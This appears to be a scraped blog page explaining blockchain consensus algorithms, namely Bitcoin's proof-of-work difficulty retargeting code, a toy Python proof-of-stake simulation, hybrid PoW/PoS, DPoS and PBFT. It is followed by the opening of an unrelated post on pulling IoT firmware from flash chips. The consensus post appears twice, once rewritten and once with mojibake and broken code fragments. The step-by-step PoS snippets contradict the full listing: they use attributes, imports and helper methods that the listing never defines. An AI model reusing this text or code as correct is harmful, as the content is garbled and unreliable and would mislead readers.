[4] After that, the new difficulty is computed using the nActualTimespan value. Bitcoin targets a block time of 10 minutes, so for 2016 blocks the target timespan (params.nPowTargetTimespan) is about two weeks (1,209,600 seconds). The difficulty is adjusted by the ratio of the actual block production time to that target.
bnNew *= nActualTimespan;
bnNew /= params.nPowTargetTimespan;
In other words, the adjustment follows the formula new target = old target x (actual timespan / target timespan). Because a larger target means a lower difficulty, blocks that arrived too quickly shrink the target (raising the difficulty) and blocks that arrived too slowly grow it, keeping the average block time around 10 minutes.
[5] Finally, to stop the difficulty from dropping too far, the new target is capped at bnPowLimit, the maximum allowed target (i.e. the minimum difficulty).
if (bnNew > bnPowLimit) bnNew = bnPowLimit;
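Putting [1] through [5] together, the retargeting rule can be sketched in a few lines of Python (a simplification of the C++ above: real Bitcoin works on 256-bit compact targets, and the pow_limit default below is only a stand-in):

```python
def retarget(old_target: int, actual_timespan: int,
             target_timespan: int = 14 * 24 * 60 * 60,
             pow_limit: int = 1 << 224) -> int:
    """Simplified next-target calculation mirroring CalculateNextWorkRequired()."""
    # [2] clamp the measured timespan to [target/4, target*4] to avoid wild swings
    actual_timespan = max(target_timespan // 4, min(actual_timespan, target_timespan * 4))
    # [4] new_target = old_target * actual / expected (a larger target means a lower difficulty)
    new_target = old_target * actual_timespan // target_timespan
    # [5] never exceed the maximum target, i.e. never fall below the minimum difficulty
    return min(new_target, pow_limit)

# Blocks arrived twice as fast as intended -> the target halves (difficulty doubles).
print(retarget(old_target=1 << 200, actual_timespan=7 * 24 * 60 * 60) == 1 << 199)
```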
However, as mentioned in the previous post, PoW demands an enormous amount of computation and therefore consumes a great deal of power. In addition, with the rise of large mining pools, if a particular group secures more than 51% of the network's total hash power, there is a risk of transaction manipulation and double-spending attacks.
To overcome these limitations of PoW, the Proof of Stake (PoS) consensus algorithm was introduced.
Proof of Stake grants block creation and validation rights based on how many coins a participant holds and for how long. In PoW, miners have to solve complex mathematical problems; in PoS, anyone who stakes a certain amount of the network's coins can participate as a validator.
The larger a validator's stake, the higher the chance of being chosen to create a block. Security is reinforced through economic incentives: honest behaviour is rewarded, while fraudulent behaviour is penalised, for example by slashing the staked funds. The PoS concept was first implemented in Peercoin in 2012, and many blockchains have adopted it since; in 2022 Ethereum also transitioned from PoW to PoS.
I originally wanted to explain how PoS works using Ethereum as the example, but analysing its code would make this post far too long. So instead, let's work through the principles with a heavily simplified PoS consensus algorithm.
import randomimport hashlibimport time// [1]class Validator: def __init__(self, address, stake): self.address = address # Validator address self.stake = stake self.vote_weight = stake def __repr__(self): return f"Validator({self.address}, Stake: {self.stake})"class PoSBlockchain: def __init__(self): self.validators = [] self.blocks = [] def register_validator(self, address, stake): if stake < 32: print(f"[ERROR] {address} need to stake over 32 ETH") return validator = Validator(address, stake) self.validators.append(validator) print(f"[INFO] {validator} registered as a validator.")// [2] def select_proposer(self): """ Randomly select a block proposer """ total_stake = sum(v.stake for v in self.validators) rand_value = random.uniform(0, total_stake) cumulative = 0 for validator in self.validators: cumulative += validator.stake if rand_value <= cumulative: print(f"[INFO] selected validator: {validator.address}") return validator// [3] def create_block(self, proposer): """ Generate a block and calculate hash """ prev_hash = self.blocks[-1]['hash'] if self.blocks else "GENESIS" timestamp = time.time() block_data = f"{proposer.address}-{timestamp}-{prev_hash}" block_hash = hashlib.sha256(block_data.encode()).hexdigest() block = {"proposer": proposer.address, "hash": block_hash, "prev_hash": prev_hash} return block// [4] def validate_and_vote(self, block): votes = 0 for validator in self.validators: if random.random() > 0.1: # 90% probability of a valid vote votes += validator.vote_weight required_votes = sum(v.stake for v in self.validators) * 0.67 # At least 67% approval required if votes >= required_votes: self.blocks.append(block) print(f"[INFO] Validation: {block['hash']}") return True else: print("[WARNING] Not enough votes ") return False// [5] def run_consensus(self): proposer = self.select_proposer() if proposer: new_block = self.create_block(proposer) self.validate_and_vote(new_block)pos_chain = PoSBlockchain()pos_chain.register_validator("Alice", 50)pos_chain.register_validator("Bob", 40)pos_chain.register_validator("Charlie", 32)pos_chain.register_validator("Dave", 100)for _ in range(3): pos_chain.run_consensus()
[1] In Ethereum, you need to stake 32 ETH to participate as a validator.
class Validator: def __init__(self, address, stake): self.address = address self.stake = stake def __repr__(self): return f"Validator({self.address}, Stake: {self.stake})"
[2] Participants who stake more coins have a relatively higher chance of being selected as the next block proposer, but the selection is randomised so that it stays unpredictable and attacks remain difficult.
def select_proposer(self): """Select a block proposer randomly, weighted by stake""" total_stake = sum(v.stake for v in self.validators.values()) rand_value = random.uniform(0, total_stake) cumulative = 0 for validator in self.validators.values(): cumulative += validator.stake if rand_value <= cumulative: print(f"[INFO] Selected proposer: {validator.address}") return validator return None
[3] The selected validator bundles new transactions into a block and proposes it to the blockchain.
def create_block(self, proposer): """Generate a new block""" prev_hash = self.blockchain[-1]['Hash'] new_block = { "Index": len(self.blockchain), "Timestamp": str(datetime.now()), "PrevHash": prev_hash, "Validator": proposer.address } new_block["Hash"] = self.hash_block(new_block) return new_block
[4] The other validators then take part in consensus by checking the proposed block's validity and voting on it. In Ethereum's case, at least 128 validators must review and vote on a block; once sufficient consensus has been reached through this vote, the block is added to the blockchain.
def validate_and_vote(self, block): """Simulate validator voting process""" total_stake = sum(v.stake for v in self.validators.values()) votes = sum(v.stake for v in self.validators.values() if random.random() > 0.1) # # 90% chance to approve if votes >= total_stake * 0.67: # Requires at least 67% approval self.blockchain.append(block) print(f"[INFO] Block added: {block['Hash']}") return True else: print("[WARNING] Block rejected due to insufficient votes.") return False
[5] A validator that produces a block correctly receives transaction fees and network rewards.
def run_consensus(self): """Run the PoS consensus process""" proposer = self.select_proposer() if proposer: new_block = self.create_block(proposer) self.validate_and_vote(new_block) proposer.stake += 5 # reward print(f"[INFO] {proposer.address} received 5 ETH as a reward.")
PoS therefore maintains the security and integrity of the network while providing a more energy-efficient consensus mechanism than PoW. However, PoS has its own structural limitation: participants who already hold a large stake keep gaining an advantage, and there is a real risk of centralisation.
Complete Overview of Decred's Structure [Source: https://medium.com/decred/blockchain-governance-how-decred-iterates-upon-bitcoin-3cc7030c655e]
Traditional PoW offers strong security but consumes a great deal of energy and suffers from mining centralisation, while PoS is energy-efficient but carries the risk of validator centralisation. The Hybrid PoW/PoS model emerged to address both: PoW is used to produce blocks, and PoS validators then approve them.
First, miners create a new block through Proof of Work. The mined block is not appended to the chain immediately, though; it must first pass a final approval vote by PoS validators. The PoS validators participate by staking a portion of their coins, and randomly selected validators evaluate the block's validity and vote on it. Typically, if at least 3 out of 5 validators approve, the block is accepted and finally added to the blockchain.
The block reward is split between PoW miners and PoS validators. In Decred (DCR), for example, 60% of the reward goes to the PoW miner, 30% to PoS voters, and the remaining 10% to the network development fund. This discourages excessive concentration among PoW miners and gives PoS validators an incentive to take an active part in maintaining the network.
By combining PoW's strong security with PoS's energy efficiency, this structure improves resistance to 51% attacks and mitigates the validator centralisation problem.
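A toy version of that flow, using the 3-of-5 ticket vote and the Decred-style 60/30/10 reward split described above (our own simplification, not Decred's actual code):

```python
import random

def hybrid_block_accepted(num_tickets: int = 5, approvals_needed: int = 3) -> bool:
    """A PoW-mined block is only appended if enough randomly drawn PoS tickets approve it."""
    votes = sum(random.random() < 0.9 for _ in range(num_tickets))  # each ticket approves ~90% of the time
    return votes >= approvals_needed

def split_reward(block_reward: float) -> dict:
    """Decred-style split: 60% PoW miner, 30% PoS voters, 10% development fund."""
    return {"pow_miner": 0.6 * block_reward,
            "pos_voters": 0.3 * block_reward,
            "treasury": 0.1 * block_reward}

if hybrid_block_accepted():
    print(split_reward(10.0))  # e.g. {'pow_miner': 6.0, 'pos_voters': 3.0, 'treasury': 1.0}
```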
DPoS (Delegated Proof of Stake) is an improved form of the PoS consensus algorithm, designed so that transaction validation and block production in a blockchain network can be carried out more efficiently. Instead of every user producing blocks directly, token holders elect delegates and entrust them with validation and block production.
First, all token holders vote in proportion to their stake, and delegates are elected through this vote. The elected delegates then take turns producing and validating blocks in a fixed order, operating the network.
In such a system the integrity of the delegates matters a great deal. Voting is continuous: if a delegate stops producing blocks or misbehaves, token holders can vote them out and replace them. Because DPoS is run in this more democratic way and a small set of delegates produce blocks in turn, block confirmation times are short and network throughput is high; and since there is no mining competition, energy consumption is low. On the other hand, because the network is operated by a limited number of delegates, it is more prone to centralisation than PoW or PoS, and if some delegates collude, the fairness of the network can be undermined.
Representative DPoS blockchains include EOS and TRON, and projects such as Steem and Lisk also use DPoS. In these systems a fixed number of delegates operate the network and carry out the consensus process quickly.
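A minimal sketch of the two mechanics that define DPoS - stake-weighted delegate election followed by round-robin block production (illustrative only):

```python
from collections import Counter

def elect_delegates(votes: dict, seats: int = 3) -> list:
    """votes maps each token holder to (chosen candidate, stake); top candidates by total stake win."""
    tally = Counter()
    for candidate, stake in votes.values():
        tally[candidate] += stake
    return [name for name, _ in tally.most_common(seats)]

def producer_for_slot(delegates: list, slot: int) -> str:
    """Elected delegates take turns producing blocks in a fixed order."""
    return delegates[slot % len(delegates)]

delegates = elect_delegates({"alice": ("D1", 50), "bob": ("D2", 80),
                             "carol": ("D1", 40), "dave": ("D3", 20)})
print(delegates)                                             # ['D1', 'D2', 'D3'] by total stake
print([producer_for_slot(delegates, s) for s in range(5)])   # ['D1', 'D2', 'D3', 'D1', 'D2']
```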
Those of you who have studied blockchain have probably heard of the Byzantine Generals Problem.
PBFT (Practical Byzantine Fault Tolerance) was devised to deal with this problem, and it works as follows.
PBFT is an algorithm that reaches consensus safely even when some nodes in the network do not respond, or respond with incorrect information. Specifically, with 3f+1 nodes in total, the network can keep operating safely even if f of them are malicious (Byzantine). Unlike PoW or PoS, this consensus algorithm requires no computational competition; consensus is reached through voting, which guarantees fast transaction finality.
Figure 1. Byzantine Generals Problem [Source: image attached to the paper]
PBFT consists of a client and replicas, one of which acts as the leader (primary) node. Consensus proceeds through the phases below (Request, Pre-Prepare, Prepare, Commit, Reply), where f is the number of Byzantine-faulty nodes that can be tolerated.
Request: the client sends a request to the leader node.
Pre-Prepare: the leader node broadcasts the request to all backup nodes. If the leader is malicious it could choose an invalid request here, but this is caught during the later phases.
Prepare: each backup node verifies the Pre-Prepare message received from the leader and then sends a PREPARE message to the other nodes. A node can trust the request once it has received at least 2f+1 matching PREPARE messages for it.
Commit: once a backup node has received 2f+1 PREPARE messages, it trusts the request and broadcasts a COMMIT message to the other nodes. When a node receives 2f+1 matching COMMIT messages for the same request, the request is finalised.
Reply: when the client receives f+1 matching replies, it knows the request has been processed successfully.
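The quorum sizes used in those phases follow directly from n = 3f + 1; a small helper makes the thresholds explicit (simple arithmetic, not a full PBFT implementation):

```python
def pbft_thresholds(f: int) -> dict:
    """Quorum sizes for a PBFT network that tolerates f Byzantine nodes."""
    n = 3 * f + 1
    return {"replicas": n,                  # total replicas required
            "prepare_quorum": 2 * f + 1,    # matching PREPARE messages needed to trust a request
            "commit_quorum": 2 * f + 1,     # matching COMMIT messages needed to finalise it
            "client_replies": f + 1}        # matching replies the client waits for

print(pbft_thresholds(1))  # {'replicas': 4, 'prepare_quorum': 3, 'commit_quorum': 3, 'client_replies': 2}
```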
PBFT is a consensus algorithm that offers fast transaction finality and strong security. Unlike PoW or PoS there is no computational race, and the network can keep operating safely as long as no more than one third of the nodes are Byzantine-faulty. The downside is scalability: as the network grows, the consensus process slows down.
PBFT is used in Hyperledger Fabric, Zilliqa and others, and is regarded as a good fit for private blockchains and networks with a small number of nodes.
That wraps up the five blockchain consensus algorithms! Some were covered in more detail than others; Proof of Work and Proof of Stake are the ones I became most familiar with while studying, so those parts ended up a little longer. There are many other consensus algorithms out there, but today I covered only the five best-known ones.
Thank you for reading this long post. If I come across more interesting material, I'll write it up as well. Thanks!
Hello! Itโs bekim.
In my previous post, I briefly explained that transactions in the Bitcoin network become possible by adding new blocks through a mechanism called โProof of Work.โ. But, PoW isn\โt the only consensus algorithm available. Actually there are actually many different consensus algorithms used in blockchain systems.
A consensus algorithm is basically the mechanism by which participants in a blockchain network agree on choosing a single valid block and maintaining the chain.
In this post, Iโll introduce various consensus algorithms: PoW, PoS, DPoS, PBFT, and Hybrid PoW/PoS.
To explain this a bit further, Proof of Work is a method where participants (miners) need to find a hash value that meets a specific difficulty requirement. This mechanism was first introduced by Bitcoin. Miners repeatedly adjust a Nonce value, attempting to find a hash that matches the target difficulty.
Bitcoin aims to generate a new block roughly every 10 minutes. To keep this timing consistent, the network automatically adjusts the mining difficulty approximately every two weeks (every 2016 blocks)
Now, letโs take a closer look at how Proof of Work (PoW) functions in Bitcoinโs latest implementation.
unsigned int GetNextWorkRequired(const CBlockIndex* pindexLast, const CBlockHeader *pblock, const Consensus::Params& params){ assert(pindexLast != nullptr); unsigned int nProofOfWorkLimit = UintToArith256(params.powLimit).GetCompact();// Only change once per difficulty adjustment interval // [1] if ((pindexLast->nHeight+1) % params.DifficultyAdjustmentInterval() != 0) { if (params.fPowAllowMinDifficultyBlocks) { // Special difficulty rule for testnet: // If the new block's timestamp is more than 2* 10 minutes // then allow mining of a min-difficulty block. // [2] if (pblock->GetBlockTime() > pindexLast->GetBlockTime() + params.nPowTargetSpacing*2) return nProofOfWorkLimit; else { // Return the last non-special-min-difficulty-rules-block // [3] const CBlockIndex* pindex = pindexLast; while (pindex->pprev && pindex->nHeight % params.DifficultyAdjustmentInterval() != 0 && pindex->nBits == nProofOfWorkLimit) pindex = pindex->pprev; return pindex->nBits; } } // [4] return pindexLast->nBits; } // Go back by what we want to be 14 days worth of blocks // [5] int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); assert(nHeightFirst >= 0); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); assert(pindexFirst); return CalculateNextWorkRequired(pindexLast, pindexFirst->GetBlockTime(), params);}
pindexLast->nHeight+1
) is not a multiple of 2016 (params.DifficultyAdjustmentInterval()
), Bitcoin retains the difficulty level (pindexLast->nBits
)[4] from the previous block without any adjustment.nProofOfWorkLimit
).const CBlockIndex* pindex = pindexLast;while (pindex->pprev && pindex->nHeight % params.DifficultyAdjustmentInterval() != 0 && pindex->nBits == nProofOfWorkLimit) pindex = pindex->pprev;return pindex->nBits;
For this purpose, Bitcoin checks the most recently added block (pindexLast
) and traces back from there. While traversing backward through previous blocks, Bitcoin skips blocks where the difficulty was temporarily reduced to the minimum (pindex->nBits == nProofOfWorkLimit
). Specifically, it continues moving backward through blocks that havenโt yet reached the difficulty adjustment interval (pindex->nHeight % params.DifficultyAdjustmentInterval() != 0
) until it finds a block where an actual difficulty adjustment occurred. At that point, it stops searching and uses that blockโs difficulty as a reference.
[5] However, if the current block height (pindexLast->nHeight
) is a multiple of the difficulty adjustment interval (2016 blocks), Bitcoin recalculates the difficulty level instead of using the previous one.
Bitcoin is designed so that if the previous 2016 blocks were generated faster than expected, the difficulty increases. On the other hand, if those blocks were generated more slowly than expected, the difficulty is lowered.
unsigned int CalculateNextWorkRequired(const CBlockIndex* pindexLast, int64_t nFirstBlockTime, const Consensus::Params& params){ if (params.fPowNoRetargeting) return pindexLast->nBits; // Limit adjustment step // [1] int64_t nActualTimespan = pindexLast->GetBlockTime() - nFirstBlockTime; // [2] if (nActualTimespan < params.nPowTargetTimespan/4) nActualTimespan = params.nPowTargetTimespan/4; if (nActualTimespan > params.nPowTargetTimespan*4) nActualTimespan = params.nPowTargetTimespan*4; // Retarget const arith_uint256 bnPowLimit = UintToArith256(params.powLimit); arith_uint256 bnNew; // Special difficulty rule for Testnet4 // [3] if (params.enforce_BIP94) { // Here we use the first block of the difficulty period. This way // the real difficulty is always preserved in the first block as // it is not allowed to use the min-difficulty exception. int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); bnNew.SetCompact(pindexFirst->nBits); } else { bnNew.SetCompact(pindexLast->nBits); }// [4] bnNew *= nActualTimespan; bnNew /= params.nPowTargetTimespan;// [5] if (bnNew > bnPowLimit) bnNew = bnPowLimit; return bnNew.GetCompact();}
pindexLast->GetBlockTime()
) with the timestamp from 2016 blocks ago (nFirstBlockTime
) to calculate the actual time taken to generate the previous 2016 blocks, storing this result in nActualTimespan
. This value serves as the basis for adjusting the difficulty later.int64_t nActualTimespan = pindexLast->GetBlockTime() - nFirstBlockTime;
[2] Bitcoin measures nActualTimespan
and compares it to the target time (params.nPowTargetTimespan
) to adjust the difficulty. To prevent drastic changes in difficulty, the adjustment is limitedโdifficulty can only increase up to 1/4 of the target time or decrease up to 4 times the target time.
if (nActualTimespan < params.nPowTargetTimespan/4) nActualTimespan = params.nPowTargetTimespan/4;if (nActualTimespan > params.nPowTargetTimespan*4) nActualTimespan = params.nPowTargetTimespan*4;
params.enforce_BIP94
.pindexFirst->nBits
) is used as the reference. This helps prevent exceptional cases where the difficulty could drop to the minimum value. If the rule is not applied, the difficulty of the current block (pindexLast->nBits
) is used instead.if (params.enforce_BIP94) { // Here we use the first block of the difficulty period. This way // the real difficulty is always preserved in the first block as // it is not allowed to use the min-difficulty exception. int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); bnNew.SetCompact(pindexFirst->nBits);} else { bnNew.SetCompact(pindexLast->nBits);}
BIP (Bitcoin Improvement Proposal): A proposal for improving the Bitcoin protocol. BIP94 is one of these proposals and is designed to prevent the difficulty from dropping excessively in certain networks (such as Testnet4) during difficulty adjustments.
[4] After that, Bitcoin calculates the new difficulty using the nActualTimespan
value. Bitcoin sets the target block generation time to 10 minutes, and assuming 2016 blocks are created, the target time (params.nPowTargetTimespan
) is approximately two weeks (1,209,600 seconds). The difficulty is then adjusted based on the ratio between the actual block generation time and the target time.
bnNew *= nActualTimespan;bnNew /= params.nPowTargetTimespan;
By applying this formula, Bitcoin ensures that the average block generation time stays around 10 minutes.
[5] Plus, to prevent the difficulty from dropping too low, it is restricted from falling below the minimum difficulty (bnPowLimit
).
if (bnNew > bnPowLimit) bnNew = bnPowLimit;
Proof of Stake (PoS) is a consensus algorithm that grants block creation and validation rights based on the amount of cryptocurrency a user holds and how long they've held it.

In PoW, miners have to solve complex mathematical problems, but in PoS, users can participate as validators by staking a certain amount of the network's cryptocurrency. The more coins a validator stakes, the higher their chances of being selected to create a new block. PoS also enhances security through economic incentives: honest validators receive rewards, while those who engage in fraudulent activities face penalties, such as losing a portion of their staked funds.

The PoS concept was first implemented in Peercoin in 2012, and many blockchains have adopted it since then. In 2022, Ethereum also transitioned from PoW to PoS.

I was going to use Ethereum as an example to explain how PoS works, but analyzing its code would make this post way too long. So instead, let's break it down using a highly simplified version of the PoS consensus algorithm to understand the core principles.
import random
import hashlib
import time

# [1]
class Validator:
    def __init__(self, address, stake):
        self.address = address  # Validator address
        self.stake = stake
        self.vote_weight = stake

    def __repr__(self):
        return f"Validator({self.address}, Stake: {self.stake})"

class PoSBlockchain:
    def __init__(self):
        self.validators = []
        self.blocks = []

    def register_validator(self, address, stake):
        if stake < 32:
            print(f"[ERROR] {address} needs to stake at least 32 ETH")
            return
        validator = Validator(address, stake)
        self.validators.append(validator)
        print(f"[INFO] {validator} registered as a validator.")

    # [2]
    def select_proposer(self):
        """Randomly select a block proposer, weighted by stake"""
        total_stake = sum(v.stake for v in self.validators)
        rand_value = random.uniform(0, total_stake)
        cumulative = 0
        for validator in self.validators:
            cumulative += validator.stake
            if rand_value <= cumulative:
                print(f"[INFO] selected validator: {validator.address}")
                return validator

    # [3]
    def create_block(self, proposer):
        """Generate a block and calculate its hash"""
        prev_hash = self.blocks[-1]['hash'] if self.blocks else "GENESIS"
        timestamp = time.time()
        block_data = f"{proposer.address}-{timestamp}-{prev_hash}"
        block_hash = hashlib.sha256(block_data.encode()).hexdigest()
        block = {"proposer": proposer.address, "hash": block_hash, "prev_hash": prev_hash}
        return block

    # [4]
    def validate_and_vote(self, block):
        votes = 0
        for validator in self.validators:
            if random.random() > 0.1:  # 90% probability of a valid vote
                votes += validator.vote_weight
        required_votes = sum(v.stake for v in self.validators) * 0.67  # At least 67% approval required
        if votes >= required_votes:
            self.blocks.append(block)
            print(f"[INFO] Validation: {block['hash']}")
            return True
        else:
            print("[WARNING] Not enough votes")
            return False

    # [5]
    def run_consensus(self):
        proposer = self.select_proposer()
        if proposer:
            new_block = self.create_block(proposer)
            self.validate_and_vote(new_block)

pos_chain = PoSBlockchain()
pos_chain.register_validator("Alice", 50)
pos_chain.register_validator("Bob", 40)
pos_chain.register_validator("Charlie", 32)
pos_chain.register_validator("Dave", 100)
for _ in range(3):
    pos_chain.run_consensus()
[1] In Ethereum, you need to stake 32 ETH to participate as a validator.
class Validator:
    def __init__(self, address, stake):
        self.address = address
        self.stake = stake

    def __repr__(self):
        return f"Validator({self.address}, Stake: {self.stake})"
[2] Participants who stake more coins have a higher chance of being selected as the next block validator, but the selection process also involves randomization to make it unpredictable and harder to manipulate.
def select_proposer(self):
    """Select a block proposer randomly, weighted by stake"""
    total_stake = sum(v.stake for v in self.validators.values())
    rand_value = random.uniform(0, total_stake)
    cumulative = 0
    for validator in self.validators.values():
        cumulative += validator.stake
        if rand_value <= cumulative:
            print(f"[INFO] Selected proposer: {validator.address}")
            return validator
    return None
[3] The selected validator bundles new transactions, creates a block, and proposes it to the blockchain.
def create_block(self, proposer):
    """Generate a new block"""
    prev_hash = self.blockchain[-1]['Hash']
    new_block = {
        "Index": len(self.blockchain),
        "Timestamp": str(datetime.now()),
        "PrevHash": prev_hash,
        "Validator": proposer.address
    }
    new_block["Hash"] = self.hash_block(new_block)
    return new_block
[4] Other validators participate in the consensus process by verifying the block's validity and voting on it. In Ethereum, at least 128 validators must review and vote on a block. Once enough consensus is reached through this voting process, the block is added to the blockchain.
def validate_and_vote(self, block):
    """Simulate the validator voting process"""
    total_stake = sum(v.stake for v in self.validators.values())
    votes = sum(v.stake for v in self.validators.values() if random.random() > 0.1)  # 90% chance to approve
    if votes >= total_stake * 0.67:  # Requires at least 67% approval
        self.blockchain.append(block)
        print(f"[INFO] Block added: {block['Hash']}")
        return True
    else:
        print("[WARNING] Block rejected due to insufficient votes.")
        return False
[5] Validators who successfully create a valid block receive transaction fees and network rewards as compensation.
def run_consensus(self):
    """Run the PoS consensus process"""
    proposer = self.select_proposer()
    if proposer:
        new_block = self.create_block(proposer)
        self.validate_and_vote(new_block)
        proposer.stake += 5  # reward
        print(f"[INFO] {proposer.address} received 5 ETH as a reward.")
Because of this system, PoS helps maintain the security and integrity of the network while being more energy-efficient than PoW. However, PoS has its own limitations. Those who hold more coins tend to have a continuous advantage, leading to potential centralization risks in the network.
Complete Overview of Decred's Structure [Source: https://medium.com/decred/blockchain-governance-how-decred-iterates-upon-bitcoin-3cc7030c655e]
The traditional PoW provides high security but has high energy consumption and the issue of mining monopolization. On the other hand, the PoS method is energy-efficient but comes with the risk of validator monopoly. To solve this, the Hybrid PoW/PoS model emerged. In this method, PoW is used to generate blocks, while PoS validators approve them.
First, a miner performs computations using the Proof-of-Work method to create a new block. However, the created block is not immediately added to the chain but goes through a final approval process via the PoS validators' vote. PoS validators participate by staking a certain amount of the cryptocurrency they hold, and randomly selected validators evaluate the validity of the block and vote on it. Typically, if at least 3 out of 5 validators approve, the block is validated and added to the blockchain. The rewards are distributed to both PoW miners and PoS validators. For example, in Decred (DCR), 60% of the reward is given to PoW miners, 30% goes to PoS validators, and the remaining 10% is allocated to the network development fund. Through this, excessive monopolization by PoW miners is prevented, and PoS validators are incentivized to actively participate in maintaining the network.
By combining PoW's high security with PoS's energy efficiency, this structure strengthens resistance against 51% attacks and mitigates validator centralization issues.
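To make the flow above easier to picture, here is a toy Python sketch of a single hybrid round; the 5-ticket vote, 3-vote threshold, and 60/30/10 split mirror the description above, but everything else is simplified and is not Decred's actual implementation.

import random

BLOCK_REWARD = 100  # arbitrary units for illustration

def hybrid_round(ticket_pool, approve_prob=0.9):
    # A PoW miner proposes a block; 5 randomly drawn PoS tickets vote on it.
    voters = random.sample(ticket_pool, 5)
    approvals = sum(1 for _ in voters if random.random() < approve_prob)
    if approvals < 3:
        return None  # block rejected: the miner gets nothing
    return {
        "miner_reward": BLOCK_REWARD * 0.60,
        "voter_reward_each": BLOCK_REWARD * 0.30 / 5,
        "treasury": BLOCK_REWARD * 0.10,
        "approvals": approvals,
    }

print(hybrid_round([f"ticket-{i}" for i in range(40)]))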
Delegated Proof of Stake (DPoS) is an improved version of the traditional PoS consensus algorithm, designed to make transaction verification and block generation in blockchain networks more efficient. Instead of users directly creating blocks, DPoS allows them to elect delegates, who are then entrusted with the responsibility of validating transactions and generating blocks.
First, all token holders vote based on their stake to elect delegates. These elected delegates take turns generating and validating blocks in a fixed order, playing a key role in maintaining the network.
In this system, the integrity of the delegates is crucial. Voting is an ongoing process, and if a delegate fails to create blocks or engages in dishonest behavior, token holders can replace them through re-elections. Because DPoS operates in a more democratic manner and delegates take turns producing blocks, it achieves faster block finalization times, leading to better network performance. Additionally, since there is no mining competition, energy consumption is significantly lower compared to PoW. However, since the number of delegates is limited, DPoS carries a higher risk of centralization compared to PoW or PoS. If a small group of delegates collude, it could undermine the fairness of the network.
Notable DPoS-based blockchains include EOS and TRON, as well as projects like Steem and Lisk, which also utilize DPoS. In these systems, a fixed number of delegates manage the network and execute the consensus process efficiently.
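Here is a minimal Python sketch of the DPoS idea described above: stake-weighted votes elect a small set of delegates, who then produce blocks in a fixed rotation. It is an illustration only, not how EOS or TRON actually implement it.

from collections import Counter

def elect_delegates(votes, n_delegates=3):
    # votes: list of (voter_stake, candidate) pairs; stake acts as voting weight
    tally = Counter()
    for stake, candidate in votes:
        tally[candidate] += stake
    return [name for name, _ in tally.most_common(n_delegates)]

def produce_schedule(delegates, n_blocks=6):
    # Elected delegates take turns producing blocks in a fixed order
    return [delegates[i % len(delegates)] for i in range(n_blocks)]

votes = [(50, "Alice"), (80, "Bob"), (30, "Carol"), (70, "Dave"), (20, "Carol")]
delegates = elect_delegates(votes)
print("Delegates:", delegates)
print("Block producers:", produce_schedule(delegates))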
Those who have studied blockchain may have heard of the Byzantine Generals Problem.
Byzantine fault tolerance was devised to address this issue, and the problem itself is described as follows:
Thus, the generals need a reliable communication method (algorithm) that enables them to reach a correct agreement in any situation.
This is the essence of the "Byzantine Generals Problem."
PBFT (Practical Byzantine Fault Tolerance) is a consensus algorithm designed to ensure secure agreement within a network, even if some nodes fail to respond or provide incorrect information. In particular, when there are 3f + 1 nodes, the system can remain secure and functional even if up to f nodes are malicious (Byzantine). Unlike PoW or PoS, this consensus algorithm does not require computational competition. Instead, it operates based on a voting system, allowing for faster transaction finality.
Figure 1. Byzantine Generals Problem Image [Source: Attached research paper]
PBFT consists of clients and replicas, with one of the replicas acting as the leader (Primary) node. To achieve consensus, it follows a four-step protocol: Request, Pre-prepare, Prepare, and Commit. (f: The number of nodes that can exhibit Byzantine faults)
Request
The client sends a request to the leader node.
Pre-Prepare
The leader node broadcasts the request to all backup nodes. At this stage, if the leader node is malicious, it could propagate an incorrect request. However, the following steps will verify its validity.
Prepare
Each backup node verifies the Pre-Prepare message sent by the leader node and then broadcasts a PREPARE message to the other nodes. At this stage, a node considers the request trustworthy if it receives at least 2f + 1 PREPARE messages for the same request.
Commit
Each backup node considers the request trustworthy once it receives 2f + 1 PREPARE messages and then sends a COMMIT message to the other nodes. Nodes finalize the request when they receive 2f + 1 COMMIT messages for the same request.
Reply
The client confirms that the request has been successfully processed once it receives f + 1 matching responses.
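To see why the 2f + 1 thresholds work, here is a minimal Python sketch of the quorum arithmetic; it only counts votes and does not model the actual message exchange between replicas.

def pbft_round(f, byzantine):
    # With n = 3f + 1 replicas, a request is prepared/committed once 2f + 1
    # matching messages are seen, and the client accepts f + 1 matching replies.
    n = 3 * f + 1
    quorum = 2 * f + 1
    honest = n - byzantine
    prepared = honest >= quorum                 # enough matching PREPARE messages
    committed = prepared and honest >= quorum   # enough matching COMMIT messages
    replied = honest >= f + 1                   # client sees f + 1 matching replies
    return {"n": n, "quorum": quorum, "prepared": prepared,
            "committed": committed, "client_accepts": committed and replied}

print(pbft_round(f=1, byzantine=1))  # 4 replicas tolerate 1 Byzantine node
print(pbft_round(f=1, byzantine=2))  # 2 faulty nodes break the 2f + 1 quorum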
PBFT is a consensus algorithm that provides fast transaction finality and high security. Unlike PoW or PoS, it does not rely on computational competition and can maintain network stability even with up to one-third Byzantine faults. However, as the network grows, the consensus process slows down, making scalability a major limitation. PBFT is used in Hyperledger Fabric, Zilliqa, and other blockchain projects. It is considered a suitable consensus algorithm for private blockchains and small-scale node networks.
We've explored five different blockchain consensus algorithms so far. Some were explained in detail, while others were covered more briefly. Since Proof of Work (PoW) and Proof of Stake (PoS) are the ones I'm most familiar with from my own studies, I ended up writing a bit more about them.
Of course, there are many other consensus algorithms out there, but for today, I focused on these five well-known ones.
Thanks for reading this long post! If I come across more interesting topics, I'll make sure to summarize them again.
Hello! I'm newp1ayer48, and it's a pleasure to introduce myself!
The starting point of IoT/embedded hacking, and its most crucial part, is obtaining the firmware.
Firmware is essential because it lets you understand how the device operates, identify the vectors where vulnerabilities may arise, and analyze the code.
There are several ways to obtain firmware, but here are some representative methods:
Flash memory is a chip typically used for storage purposes and is commonly found in IoT devices in an 8-pin form.
Since the firmware is ultimately stored in this Flash Memory chip, directly extracting the firmware from Flash Memory has the advantage of being a more reliable method.
Using the flashrom program, you can easily extract the firmware from Flash Memory.
However, this method can potentially damage the equipment and board, so you should proceed with caution.
Because heat is applied directly to the board using tools like soldering irons or heat guns, there is a risk of damaging the chip or the board, and improper connections may lead to short circuits.
Due to these risks, you may end up damaging IoT/embedded equipment that was purchased for bug bounty purposes.
It's somewhat like trying to extract a golden egg by cutting open a goose's belly, only to kill the goose in the process...
